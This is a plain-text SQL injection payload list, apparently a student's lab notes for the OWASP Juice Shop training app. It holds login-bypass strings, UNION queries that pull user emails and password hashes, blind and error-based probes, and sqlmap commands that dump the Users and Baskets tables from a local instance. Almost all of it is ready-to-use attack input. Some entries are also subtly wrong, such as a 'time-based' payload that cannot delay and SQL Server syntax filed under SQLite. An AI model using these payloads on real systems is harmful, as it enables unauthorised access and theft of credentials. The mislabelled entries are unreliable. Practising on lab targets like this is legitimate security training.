# ============================================================
# SQL INJECTION PAYLOADS - OWASP Juice Shop
# Autor: Daniel de Souza de Aguiar
# Data: Abril/2026
# ============================================================

# ------------------------------------------------------------
# 1. AUTHENTICATION BYPASS (Login sem senha)
# ------------------------------------------------------------

# Payload básico - comentário SQL
' OR 1=1--

# Variação com espaço
' OR '1'='1

# Variação com comentário em SQLite
' OR 1=1#

# Para MySQL (comentário)
' OR 1=1#

# Para PostgreSQL
' OR '1'='1'--

# ------------------------------------------------------------
# 2. UNION-BASED INJECTION (Extração de dados)
# ------------------------------------------------------------

# Descobrir número de colunas
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
' ORDER BY 4--
' ORDER BY 5--
' ORDER BY 6--
' ORDER BY 7--
' ORDER BY 8--
' ORDER BY 9--

# UNION com número crescente de colunas
' UNION SELECT 1--
' UNION SELECT 1,2--
' UNION SELECT 1,2,3--
' UNION SELECT 1,2,3,4--
' UNION SELECT 1,2,3,4,5--
' UNION SELECT 1,2,3,4,5,6--
' UNION SELECT 1,2,3,4,5,6,7--
' UNION SELECT 1,2,3,4,5,6,7,8--
' UNION SELECT 1,2,3,4,5,6,7,8,9--

# Extrair emails e senhas (SQLite)
' UNION SELECT email,password,3,4,5,6,7,8,9 FROM Users--

# Extrair dados específicos
' UNION SELECT NULL,email,password,3,4,5,6,7,8 FROM Users--

# ------------------------------------------------------------
# 3. BOOLEAN-BASED BLIND INJECTION
# ------------------------------------------------------------

# Teste de condição verdadeira
' AND 1=1--

# Teste de condição falsa
' AND 1=2--

# Extrair tamanho da senha (exemplo)
' AND LENGTH(password)=32--

# Extrair primeiro caractere da senha (exemplo)
' AND SUBSTR(password,1,1)='a'--

# ------------------------------------------------------------
# 4. TIME-BASED BLIND INJECTION (SQLite)
# ------------------------------------------------------------

# Delay de 5 segundos
' AND 1=1 AND CASE WHEN 1=1 THEN 1=1 ELSE randomblob(100000000) END--

# ------------------------------------------------------------
# 5. ERROR-BASED INJECTION (para identificação)
# ------------------------------------------------------------

# Forçar erro de sintaxe
'

# Forçar erro de tipo
' AND 1=convert(int,@@version)--

# ------------------------------------------------------------
# 6. PAYLOADS ESPECÍFICOS PARA SQLITE
# ------------------------------------------------------------

# Extrair versão do SQLite
' UNION SELECT sqlite_version(),2,3,4,5,6,7,8,9--

# Listar todas as tabelas
' UNION SELECT name,2,3,4,5,6,7,8,9 FROM sqlite_master WHERE type='table'--

# Listar estrutura da tabela Users
' UNION SELECT sql,2,3,4,5,6,7,8,9 FROM sqlite_master WHERE name='Users'--

# Extrair dados com concatenação
' UNION SELECT email||':'||password,2,3,4,5,6,7,8,9 FROM Users--

# ============================================================
# COMANDOS SQLMAP UTILIZADOS
# ============================================================

# Testar vulnerabilidade
sqlmap -u "http://localhost:3000/rest/products/search?q=1" --level=3 --dbms=sqlite --batch

# Listar bancos de dados
sqlmap -u "http://localhost:3000/rest/products/search?q=1" --level=3 --dbms=sqlite --batch --dbs

# Listar tabelas
sqlmap -u "http://localhost:3000/rest/products/search?q=1" --level=3 --dbms=sqlite --batch --tables

# Extrair tabela Users completa
sqlmap -u "http://localhost:3000/rest/products/search?q=1" --level=3 --dbms=sqlite --batch -T Users --dump

# Extrair colunas específicas
sqlmap -u "http://localhost:3000/rest/products/search?q=1" --level=3 --dbms=sqlite --batch -T Users -C email,password --dump

# Extrair tabela Baskets (IDOR)
sqlmap -u "http://localhost:3000/rest/products/search?q=1" --level=3 --dbms=sqlite --batch -T Baskets --dump

# ============================================================